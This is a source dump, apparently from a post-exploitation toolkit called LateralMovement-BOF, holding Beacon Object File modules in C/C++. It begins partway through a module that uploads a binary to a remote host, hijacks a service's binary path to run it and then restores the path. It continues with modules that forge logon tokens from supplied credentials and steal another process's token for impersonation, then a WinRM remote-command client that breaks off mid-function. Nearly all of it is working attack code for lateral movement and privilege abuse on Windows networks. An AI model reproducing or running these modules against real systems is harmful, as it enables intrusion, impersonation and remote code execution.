WINBASEAPI int __cdecl MSVCRT$_snprintf(char * __restrict__ d, size_t n, const char * __restrict__ format, ...);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE, DWORD, PHANDLE);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE);
DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR, LPCSTR, DWORD);
DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$OpenServiceA(SC_HANDLE, LPCSTR, DWORD);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$QueryServiceConfigA(SC_HANDLE, LPQUERY_SERVICE_CONFIGA, DWORD, LPDWORD);
DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalAlloc(UINT, SIZE_T);
DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalFree(HGLOBAL);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ChangeServiceConfigA(SC_HANDLE, DWORD, DWORD, DWORD, LPCSTR, LPCSTR, LPDWORD, LPCSTR, LPCSTR, LPCSTR, LPCSTR);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE,DWORD, LPCSTR*);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE);
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError();
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess();
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$DeleteFileA(LPCSTR);

void go(char * args, int length) {
    // Parse Beacon Arguments
    datap parser;
    CHAR * targetHost;
    CHAR * serviceName;
    CHAR * payload;
    ULONG binarySize = 0;
    CHAR * binaryData = NULL;

    BeaconDataParse(&parser, args, length);
    targetHost = BeaconDataExtract(&parser, NULL);
    serviceName = BeaconDataExtract(&parser, NULL);
    payload = BeaconDataExtract(&parser, NULL);

    // Check if there's binary data (for jump mode)
    if (BeaconDataLength(&parser) > 0) {
        binaryData = BeaconDataExtract(&parser, &binarySize);
    }

    LPQUERY_SERVICE_CONFIGA lpqsc = NULL;
    DWORD dwLpqscSize = 0;
    CHAR* originalBinaryPath = NULL;
    BOOL bResult = FALSE;

    BeaconPrintf(CALLBACK_OUTPUT, "Trying to connect to %s\n", targetHost);

#ifdef _IMP
    HANDLE hToken = NULL;

    BeaconPrintf(CALLBACK_OUTPUT, "Using current process context for authentication (impersonation)\n");
    if(!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {
        BeaconPrintf(CALLBACK_ERROR, "OpenProcessToken failed: %ld\n", KERNEL32$GetLastError());
        return;
    }

    bResult = FALSE;
    bResult = ADVAPI32$ImpersonateLoggedOnUser(hToken);
    if(!bResult) {
        BeaconPrintf(CALLBACK_ERROR, "ImpersonateLoggedOnUser failed: %ld\n", KERNEL32$GetLastError());
        KERNEL32$CloseHandle(hToken);
        return;
    }
#endif

    // If binary data is provided, upload it first
    if (binaryData && binarySize > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "Uploading binary (%lu bytes) to: %s\n", binarySize, payload);

        HANDLE hFile = KERNEL32$CreateFileA(payload, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile == INVALID_HANDLE_VALUE) {
            BeaconPrintf(CALLBACK_ERROR, "CreateFileA failed: %lu\n", KERNEL32$GetLastError());
#ifdef _IMP
            KERNEL32$CloseHandle(hToken);
#endif
            return;
        }

        DWORD bytesWritten;
        if (!KERNEL32$WriteFile(hFile, binaryData, binarySize, &bytesWritten, NULL)) {
            BeaconPrintf(CALLBACK_ERROR, "WriteFile failed: %lu\n", KERNEL32$GetLastError());
            KERNEL32$CloseHandle(hFile);
#ifdef _IMP
            KERNEL32$CloseHandle(hToken);
#endif
            return;
        }
        KERNEL32$CloseHandle(hFile);
        BeaconPrintf(CALLBACK_OUTPUT, "Binary uploaded successfully (%lu bytes written)\n", bytesWritten);
    }

    SC_HANDLE schManager = ADVAPI32$OpenSCManagerA(targetHost, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
    if(schManager == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "OpenSCManagerA failed: %ld\n", KERNEL32$GetLastError());
        if (binaryData && binarySize > 0) {
            KERNEL32$DeleteFileA(payload);
        }
#ifdef _IMP
        KERNEL32$CloseHandle(hToken);
#endif
        return;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "SC_HANDLE Manager: 0x%p\n", schManager);

    BeaconPrintf(CALLBACK_OUTPUT, "Opening service: %s\n", serviceName);
    SC_HANDLE schService = ADVAPI32$OpenServiceA(schManager, serviceName, SERVICE_ALL_ACCESS);
    if(schService == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "OpenServiceA failed: %ld\n", KERNEL32$GetLastError());
        ADVAPI32$CloseServiceHandle(schManager);
        if (binaryData && binarySize > 0) {
            KERNEL32$DeleteFileA(payload);
        }
#ifdef _IMP
        KERNEL32$CloseHandle(hToken);
#endif
        return;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "SC_HANDLE Service: 0x%p\n", schService);

    DWORD dwSize = 0;
    ADVAPI32$QueryServiceConfigA(schService, NULL, 0, &dwSize);
    if(dwSize) {
        dwLpqscSize = dwSize;
        BeaconPrintf(CALLBACK_OUTPUT, "LPQUERY_SERVICE_CONFIGA needs 0x%08x bytes\n", dwLpqscSize);
        lpqsc = KERNEL32$GlobalAlloc(GPTR, dwSize);
        bResult = FALSE;
        bResult = ADVAPI32$QueryServiceConfigA(schService, lpqsc, dwLpqscSize, &dwSize);
        if(bResult) {
            originalBinaryPath = lpqsc->lpBinaryPathName;
            BeaconPrintf(CALLBACK_OUTPUT, "Original service binary path: \"%s\"\n", originalBinaryPath);
        }
    }

    bResult = FALSE;
    bResult = ADVAPI32$ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, payload, NULL, NULL, NULL, NULL, NULL, NULL);
    if(!bResult) {
        BeaconPrintf(CALLBACK_ERROR, "ChangeServiceConfigA failed to update the service path: %ld\n", KERNEL32$GetLastError());
        KERNEL32$GlobalFree(lpqsc);
        ADVAPI32$CloseServiceHandle(schService);
        ADVAPI32$CloseServiceHandle(schManager);
        if (binaryData && binarySize > 0) {
            KERNEL32$DeleteFileA(payload);
        }
#ifdef _IMP
        KERNEL32$CloseHandle(hToken);
#endif
        return;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "Service path was changed to: \"%s\"\n", payload);

    bResult = FALSE;
    bResult = ADVAPI32$StartServiceA(schService, 0, NULL);
    DWORD dwResult = KERNEL32$GetLastError();
    if(!bResult && dwResult != 1053) {
        BeaconPrintf(CALLBACK_ERROR, "StartServiceA failed to start the service: %ld\n", dwResult);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "Service was started\n");
    }

    if(dwLpqscSize && originalBinaryPath) {
        bResult = FALSE;
        bResult = ADVAPI32$ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, originalBinaryPath, NULL, NULL, NULL, NULL, NULL, NULL);
        if(!bResult) {
            BeaconPrintf(CALLBACK_ERROR, "ChangeServiceConfigA failed to revert the service path: %ld\n", KERNEL32$GetLastError());
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "Service path was restored to: \"%s\"\n", originalBinaryPath);
        }
    }

    KERNEL32$GlobalFree(lpqsc);
    ADVAPI32$CloseServiceHandle(schService);
    ADVAPI32$CloseServiceHandle(schManager);
#ifdef _IMP
    KERNEL32$CloseHandle(hToken);
#endif
}


================================================
FILE: LateralMovement-BOF/token_make/token_make.c
================================================
#include <windows.h>
#include "beacon.h"

WINBASEAPI WINBOOL WINAPI ADVAPI32$LogonUserW(LPCWSTR lpszUsername, LPCWSTR lpszDomain, LPCWSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken );
WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError(VOID);
WINADVAPI  WINBOOL WINAPI ADVAPI32$GetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
WINBASEAPI HANDLE  WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI LPVOID  WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI BOOL    WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
WINBASEAPI int     WINAPI KERNEL32$WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar);

void _memset(void* ptr, int value, size_t num) {
    if (!ptr) return;
    unsigned char* p = (unsigned char*)ptr;
    while (num--) *p++ = (unsigned char)value;
}

BOOL TokenIsElevated(HANDLE hToken)
{
    BOOL result = FALSE;
    if (hToken) {
        TOKEN_ELEVATION Elevation = { 0 };
        DWORD eleavationSize = sizeof(TOKEN_ELEVATION);
        ADVAPI32$GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &eleavationSize);
        result = Elevation.TokenIsElevated;
    }
    return result;
}

VOID go( IN PCHAR Buffer, IN ULONG Length )
{
    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    ULONG  userLen    = 0;
    WCHAR* username   = BeaconDataExtract(&parser, &userLen);
    WCHAR* password   = BeaconDataExtract(&parser, NULL);
    WCHAR* domain     = BeaconDataExtract(&parser, NULL);
    ULONG  token_type = BeaconDataInt(&parser);
    ULONG  logon_provider = 0;

    if( !username || !password || !domain )
        return;

    if ( 1 < token_type && token_type < 6 || token_type == 8 ) {
        logon_provider = LOGON32_PROVIDER_WINNT50;
    }
    else {
        token_type     = LOGON32_LOGON_NEW_CREDENTIALS;
        logon_provider = LOGON32_PROVIDER_WINNT50;
    }

    HANDLE hToken = NULL;
    if ( ADVAPI32$LogonUserW( username, domain, password, token_type, logon_provider, &hToken ) ) {
        if( BeaconUseToken(hToken) ) {
            char* user = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, userLen / 2);
            KERNEL32$WideCharToMultiByte(CP_ACP, 0, username, userLen, user, userLen / 2, NULL, 0);

			if(TokenIsElevated(hToken))
		        BeaconPrintf(CALLBACK_OUTPUT, "The user impersonated successfully: %ls\\%s (logon: %d) [elevated]\n", domain, user, token_type);
			else
		        BeaconPrintf(CALLBACK_OUTPUT, "The user impersonated successfully: %ls\\%s (logon: %d)\n", domain, user, token_type);

            _memset(user, 0, userLen / 2);
            KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, user);
        }
        else {
            BeaconPrintf(CALLBACK_ERROR, "Failed to impersonate user. Error: %d\n", KERNEL32$GetLastError());
        }
    }
    else BeaconPrintf(CALLBACK_ERROR, "Failed to create token. Error: %d\n", KERNEL32$GetLastError());
}


================================================
FILE: LateralMovement-BOF/token_steal/token_steal.c
================================================
#include <windows.h>
#include <ntsecapi.h>
#include "beacon.h"

typedef struct _OBJECT_ATTRIBUTES {
	ULONG Length;
	HANDLE RootDirectory;
	PUNICODE_STRING ObjectName;
	ULONG Attributes;
	PVOID SecurityDescriptor;
	PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

#define InitializeObjectAttributes( i, o, a, r, s ) {    \
      (i)->Length = sizeof( OBJECT_ATTRIBUTES );         \
      (i)->RootDirectory = r;                            \
      (i)->Attributes = a;                               \
      (i)->ObjectName = o;                               \
      (i)->SecurityDescriptor = s;                       \
      (i)->SecurityQualityOfService = NULL;              \
   }

typedef struct _CLIENT_ID
{
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;

WINBASEAPI NTSTATUS NTAPI NTDLL$NtOpenProcess( PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId );
WINBASEAPI NTSTATUS NTAPI NTDLL$NtOpenProcessToken( HANDLE ProcessHandle, ACCESS_MASK DesiredAccess, PHANDLE TokenHandle );
WINBASEAPI NTSTATUS NTAPI NTDLL$NtDuplicateToken( HANDLE ExistingTokenHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, BOOLEAN EffectiveOnly, TOKEN_TYPE TokenType, PHANDLE NewTokenHandle );
WINBASEAPI ULONG    NTAPI NTDLL$RtlNtStatusToDosError( NTSTATUS Status );
WINBASEAPI NTSTATUS NTAPI NTDLL$NtClose(HANDLE Handle);
WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError(VOID);
WINBASEAPI HANDLE  WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI LPVOID  WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI BOOL    WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
WINBASEAPI HLOCAL  WINAPI KERNEL32$LocalFree (HLOCAL);
WINADVAPI  WINBOOL WINAPI ADVAPI32$GetTokenInformation (HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
WINADVAPI  WINBOOL WINAPI ADVAPI32$LookupAccountSidA (LPCSTR lpSystemName, PSID Sid, LPSTR Name, LPDWORD cchName, LPSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse);
WINBASEAPI NTSTATUS NTAPI SECUR32$LsaGetLogonSessionData(PLUID LogonId,PSECURITY_LOGON_SESSION_DATA *ppLogonSessionData);
WINBASEAPI NTSTATUS NTAPI SECUR32$LsaFreeReturnBuffer (PVOID Buffer);

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

//// impersonation
//   NtOpenProcessToken - TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_IMPERSONATE
//   NtDuplicateToken   - TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_IMPERSONATE

//// Create Process
// NtOpenProcessToken - TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES | TOKEN_ASSIGN_PRIMARY
// NtDuplicateToken   - TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES

BOOL GetLogonTypeFromToken(HANDLE hToken, ULONG* logonType) {
    if (!hToken || !logonType)
        return FALSE;

    TOKEN_STATISTICS stats;
    DWORD size;
    if (!ADVAPI32$GetTokenInformation(hToken, TokenStatistics, &stats, sizeof(stats), &size)) {
        return FALSE;
    }

    LUID authId = stats.AuthenticationId;
    PSECURITY_LOGON_SESSION_DATA pSessionData = NULL;

    if (SECUR32$LsaGetLogonSessionData(&authId, &pSessionData) != 0 || pSessionData == NULL) {
        return FALSE;
    }

    *logonType = pSessionData->LogonType;

    SECUR32$LsaFreeReturnBuffer(pSessionData);
    return TRUE;
}


BOOL TokenToUser(HANDLE hToken, CHAR* username, DWORD* usernameSize, CHAR* domain, DWORD* domainSize, BOOL* elevated, DWORD* logonType)
{
    BOOL result = FALSE;
    if (hToken) {
        LPVOID tokenInfo = NULL;
        DWORD  tokenInfoSize = 0;

		result = ADVAPI32$GetTokenInformation(hToken, TokenUser, tokenInfo, 0, &tokenInfoSize);
        if (!result) {
            tokenInfo = KERNEL32$HeapAlloc( KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, tokenInfoSize );
            if (tokenInfo)
                result = ADVAPI32$GetTokenInformation(hToken, TokenUser, tokenInfo, tokenInfoSize, &tokenInfoSize);
        }

        TOKEN_ELEVATION Elevation = { 0 };
        DWORD eleavationSize = sizeof(TOKEN_ELEVATION);
        ADVAPI32$GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &eleavationSize);

        if (result) {
            SID_NAME_USE SidType;
            result = ADVAPI32$LookupAccountSidA(NULL, ((PTOKEN_USER)tokenInfo)->User.Sid, username, usernameSize, domain, domainSize, &SidType);
            if (result) {
                *elevated = Elevation.TokenIsElevated;
            }
        }

		GetLogonTypeFromToken(hToken, logonType);

        if (tokenInfo)
            KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, tokenInfo);
    }
    return result;
}

VOID go( IN PCHAR Buffer, IN ULONG Length )
{
    datap parser;
    BeaconDataParse(&parser, Buffer, Length);

    DWORD pid = BeaconDataInt(&parser);

    OBJECT_ATTRIBUTES ObjAttr  = { sizeof( ObjAttr ) };
    CLIENT_ID         Client   = {0};
    HANDLE            hProcess = NULL;

    Client.UniqueProcess = pid;
    NTSTATUS NtStatus = NTDLL$NtOpenProcess( &hProcess, PROCESS_QUERY_LIMITED_INFORMATION, &ObjAttr, &Client );
    if ( NT_SUCCESS(NtStatus) && hProcess) {

        HANDLE hToken = NULL;
        NtStatus = NTDLL$NtOpenProcessToken( hProcess, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_IMPERSONATE, &hToken );
        if ( NT_SUCCESS(NtStatus) && hToken) {

            HANDLE hDupToken = NULL;
            OBJECT_ATTRIBUTES ObjAttr;
            SECURITY_QUALITY_OF_SERVICE Sqos = { sizeof(SECURITY_QUALITY_OF_SERVICE), SecurityImpersonation, SECURITY_STATIC_TRACKING, FALSE };
            InitializeObjectAttributes(&ObjAttr, NULL, 0, NULL, NULL);
            ObjAttr.SecurityQualityOfService = &Sqos;

            NTSTATUS Status = NTDLL$NtDuplicateToken( hToken, TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_IMPERSONATE, &ObjAttr, FALSE, TokenImpersonation, &hDupToken );
            if ( NT_SUCCESS(Status) && hDupToken ) {
                if( BeaconUseToken(hDupToken) ) {
                    BOOL  elevated2     = FALSE;
                    CHAR* username2     = (CHAR*) KERNEL32$HeapAlloc( KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, 512 );
                    ULONG usernameSize2 = 512;
                    CHAR* domain2       = (CHAR*) KERNEL32$HeapAlloc( KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, 512 );
                    ULONG domainSize2   = 512;
                    ULONG logonType2    = 0;
                    BOOL result = TokenToUser(hToken, username2, &usernameSize2, domain2, &domainSize2, &elevated2, &logonType2);
                    if (result) {
                        if (elevated2)
                            BeaconPrintf(CALLBACK_OUTPUT, "The user impersonated successfully: %s\\%s (logon: %d) [elevated].\n", domain2, username2, logonType2);
                        else
                            BeaconPrintf(CALLBACK_OUTPUT, "The user impersonated successfully: %s\\%s (logon: %d).\n", domain2, username2, logonType2);
                    } else {
                        BeaconPrintf(CALLBACK_OUTPUT, "The user impersonated successfully");
                    }
                    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, username2);
                    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, domain2);
                }
                else {
                    BeaconPrintf(CALLBACK_ERROR, "Failed to impersonate user. Error: %d\n", KERNEL32$GetLastError());
                }
            }
            else {
                ULONG error = NTDLL$RtlNtStatusToDosError(NtStatus);
                BeaconPrintf(CALLBACK_ERROR, "Failed to duplicate token. Error: %d\n", error);
            }
        }
        else {
            ULONG error = NTDLL$RtlNtStatusToDosError(NtStatus);
            BeaconPrintf(CALLBACK_ERROR, "Failed to open token. Error: %d\n", error);
        }

        if ( hToken ) {
            NTDLL$NtClose(hToken);
            hToken = NULL;
        }
    }
    else {
        ULONG error = NTDLL$RtlNtStatusToDosError(NtStatus);
        BeaconPrintf(CALLBACK_ERROR, "Failed to open process. Error: %d\n", error);
    }

    if ( hProcess ) {
        NTDLL$NtClose(hProcess);
        hProcess = NULL;
    }
}

================================================
FILE: LateralMovement-BOF/winrm-client/winrm.cpp
================================================
#include <windows.h>
#define WSMAN_API_VERSION_1_0
#include <wsman.h>

extern "C" {
#include "beacon.h"

WINBASEAPI DWORD  WINAPI KERNEL32$GetLastError(VOID);
WINBASEAPI INT    WINAPI MSVCRT$vsnprintf(PCHAR d, size_t n, PCHAR format, va_list arg);
WINBASEAPI DWORD  WINAPI WsmSvc$WSManInitialize(DWORD flags, WSMAN_API_HANDLE *apiHandle);
WINBASEAPI DWORD  WINAPI WsmSvc$WSManCreateSession(WSMAN_API_HANDLE apiHandle, PCWSTR connection, DWORD flags, WSMAN_AUTHENTICATION_CREDENTIALS* serverAuthenticationCredentials, WSMAN_PROXY_INFO* proxyInfo, WSMAN_SESSION_HANDLE* session);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateEventW(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCWSTR lpName);
WINBASEAPI VOID   WINAPI WsmSvc$WSManCreateShell(WSMAN_SESSION_HANDLE session, DWORD flags, PCWSTR resourceUri, WSMAN_SHELL_STARTUP_INFO* startupInfo, WSMAN_OPTION_SET* options, WSMAN_DATA* createXml, WSMAN_SHELL_ASYNC* async, WSMAN_SHELL_HANDLE* shell);
WINBASEAPI DWORD  WINAPI KERNEL32$WaitForSingleObject(HANDLE hHandle, DWORD  dwMilliseconds);
WINBASEAPI BOOL   WINAPI KERNEL32$SetEvent(HANDLE hEvent);
WINBASEAPI VOID   WINAPI WsmSvc$WSManRunShellCommand(WSMAN_SHELL_HANDLE shell, DWORD flags, PCWSTR commandLine, WSMAN_COMMAND_ARG_SET* args, WSMAN_OPTION_SET* options, WSMAN_SHELL_ASYNC* async, WSMAN_COMMAND_HANDLE* command);
WINBASEAPI PVOID  WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI BOOL   WINAPI KERNEL32$CreatePipe(PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize);
WINBASEAPI BOOL   WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
WINBASEAPI BOOL   WINAPI KERNEL32$ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
WINBASEAPI PWCHAR WINAPI MSVCRT$wcscmp(const wchar_t* _lhs, const wchar_t* _rhs);
WINBASEAPI VOID   WINAPI WsmSvc$WSManReceiveShellOutput(WSMAN_SHELL_HANDLE shell, WSMAN_COMMAND_HANDLE command, DWORD flags, WSMAN_STREAM_ID_SET* desiredStreamSet, WSMAN_SHELL_ASYNC* async, WSMAN_OPERATION_HANDLE* receiveOperation);
WINBASEAPI VOID   WINAPI WsmSvc$WSManCloseCommand(WSMAN_COMMAND_HANDLE commandHandle, DWORD flags, WSMAN_SHELL_ASYNC* async);
WINBASEAPI VOID   WINAPI WsmSvc$WSManCloseShell(WSMAN_SHELL_HANDLE shellHandle, DWORD flags, WSMAN_SHELL_ASYNC* async);
WINBASEAPI DWORD  WINAPI WsmSvc$WSManCloseSession(WSMAN_SESSION_HANDLE session, DWORD flags);
WINBASEAPI DWORD  WINAPI WsmSvc$WSManDeinitialize(WSMAN_API_HANDLE apiHandle, DWORD flags);
WINBASEAPI DWORD  WINAPI KERNEL32$CloseHandle(HANDLE hObject);
WINBASEAPI BOOL   WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
WINBASEAPI DWORD  WINAPI WsmSvc$WSManCloseOperation(WSMAN_OPERATION_HANDLE operationHandle, DWORD flags);

#define GetLastError KERNEL32$GetLastError
#define vsnprintf MSVCRT$vsnprintf
#define WSManInitialize WsmSvc$WSManInitialize
#define WSManCreateSession WsmSvc$WSManCreateSession
#define CreateEventW KERNEL32$CreateEventW
#define WSManCreateShell WsmSvc$WSManCreateShell
#define WaitForSingleObject KERNEL32$WaitForSingleObject
#define SetEvent KERNEL32$SetEvent
#define WSManRunShellCommand WsmSvc$WSManRunShellCommand
#define HeapAlloc KERNEL32$HeapAlloc
#define GetProcessHeap KERNEL32$GetProcessHeap
#define CreatePipe KERNEL32$CreatePipe
#define WriteFile KERNEL32$WriteFile
#define ReadFile KERNEL32$ReadFile
#define wcscmp MSVCRT$wcscmp
#define WSManReceiveShellOutput WsmSvc$WSManReceiveShellOutput
#define WSManCloseCommand WsmSvc$WSManCloseCommand
#define WSManCloseShell WsmSvc$WSManCloseShell
#define WSManCloseSession WsmSvc$WSManCloseSession
#define WSManDeinitialize WsmSvc$WSManDeinitialize
#define CloseHandle KERNEL32$CloseHandle
#define HeapFree KERNEL32$HeapFree
#define WSManCloseOperation WsmSvc$WSManCloseOperation

    typedef struct  {
        HANDLE event;
        BOOL hadError;
        BOOL commandDone;
    } ctxCallback, *PCtxCallback;

    void WSManShellCompletionFunction( PVOID operationContext, DWORD flags, WSMAN_ERROR* error, WSMAN_SHELL_HANDLE shell, WSMAN_COMMAND_HANDLE command, WSMAN_OPERATION_HANDLE operationHandle, WSMAN_RECEIVE_DATA_RESULT* data )
    {
        if (operationContext == NULL) {
            BeaconPrintf(CALLBACK_ERROR, "no context was passed to WSManShellCompletionFunction\n");
            return;
        }
        PCtxCallback ctxOperation = (PCtxCallback)operationContext;
        if (error && error->code) {
            BeaconPrintf(CALLBACK_ERROR, "error WSManCreateShell: %d\n", error->code);
            ctxOperation->hadError = TRUE;
        }
        SetEvent(ctxOperation->event);
    }

    void ReceiveCallback( PVOID operationContext, DWORD flags, WSMAN_ERROR* error, WSMAN_SHELL_HANDLE shell, WSMAN_COMMAND_HANDLE command, WSMAN_OPERATION_HANDLE operationHandle, WSMAN_RECEIVE_DATA_RESULT* data )
    {
        if (operationContext == NULL) {
            BeaconPrintf(CALLBACK_ERROR, "no context was passed to WSManRunShellCommand");
            return;
        }
        PCtxCallback ctxOperation = (PCtxCallback)operationContext;
        if (error && 0 != error->code) {
            BeaconPrintf(CALLBACK_ERROR, "error WSManRunShellCommand: %d\n", error->code);
            ctxOperation->hadError = TRUE;
        }

        if (data && data->streamData.type & WSMAN_DATA_TYPE_BINARY && data->streamData.binaryData.dataLength) {
            DWORD bufferLength = data->streamData.binaryData.dataLength;
            PCHAR buffer = (PCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferLength + 1);
            if (buffer == NULL) {
                BeaconPrintf(CALLBACK_ERROR, "error HeapAlloc: %d\n", GetLastError());
                return;
            }

            for (DWORD i = 0; i < bufferLength; i++)
                buffer[i] = ((PCHAR)data->streamData.binaryData.data)[i];
            buffer[bufferLength] = '\0';
            BeaconPrintf(CALLBACK_OUTPUT, "%s", buffer);

            if (!HeapFree(GetProcessHeap(), NULL, buffer))
                BeaconPrintf(CALLBACK_ERROR, "error HeapFree: %d\n", GetLastError());
        }

        if (data && data->commandState && wcscmp(data->commandState, WSMAN_COMMAND_STATE_DONE) == 0)
            ctxOperation->commandDone = TRUE;

        if ((error && 0 != error->code) || ctxOperation->commandDone)
            SetEvent(ctxOperation->event);
    }

    void go(char* args, int length) {
        datap parser;
        BeaconDataParse(&parser, args, length);
        PWCHAR hostname = (PWCHAR)BeaconDataExtract(&parser, NULL);
        PWCHAR cmd      = (PWCHAR)BeaconDataExtract(&parser, NULL);
//        PWCHAR hostname = L"adcs";
//        PWCHAR cmd = L"whoami /all";

        HANDLE hEventShellCompl = { 0 };
        HANDLE hEventReceive = { 0 };
        WSMAN_API_HANDLE hApi = { 0 };
        WSMAN_SHELL_HANDLE hShell = { 0 };
        WSMAN_SHELL_ASYNC wsAsync = { 0 };
        WSMAN_SHELL_ASYNC wsAsyncShell = { 0 };
        WSMAN_COMMAND_HANDLE hCmd = { 0 };
        ctxCallback ctxCreateShell = { 0 };
        ctxCallback ctxReceiveShell = { 0 };
        WSMAN_OPERATION_HANDLE receiveOperation = { 0 };

        WSMAN_AUTHENTICATION_CREDENTIALS serverAuthenticationCredentials = { 0 };

        PCWSTR commandLine = cmd;
        PCWSTR connection  = hostname;
        WSMAN_SESSION_HANDLE hSession = { 0 };
        DWORD timeoutMs = 15000;
        DWORD receiveWaitMs = timeoutMs;
        DWORD waitResult = WAIT_OBJECT_0;
        BOOL background = FALSE;

        if (BeaconDataLength(&parser) >= (int)sizeof(int)) {
            timeoutMs = (DWORD)BeaconDataInt(&parser);
            receiveWaitMs = (timeoutMs == 0) ? INFINITE : timeoutMs;
        }
        if (BeaconDataLength(&parser) >= (int)sizeof(int))
            background = BeaconDataInt(&parser) ? TRUE : FALSE;

        PWCHAR username = NULL;
        PWCHAR password = NULL;
        if (BeaconDataLength(&parser) > 0)
            username = (PWCHAR)BeaconDataExtract(&parser, NULL);
        if (BeaconDataLength(&parser) > 0)
            password = (PWCHAR)BeaconDataExtract(&parser, NULL);

        if (username && username[0] != L'\0') {
            serverAuthenticationCredentials.authenticationMechanism = WSMAN_FLAG_AUTH_NEGOTIATE;
            serverAuthenticationCredentials.userAccount.username = username;
            serverAuthenticationCredentials.userAccount.password = password;
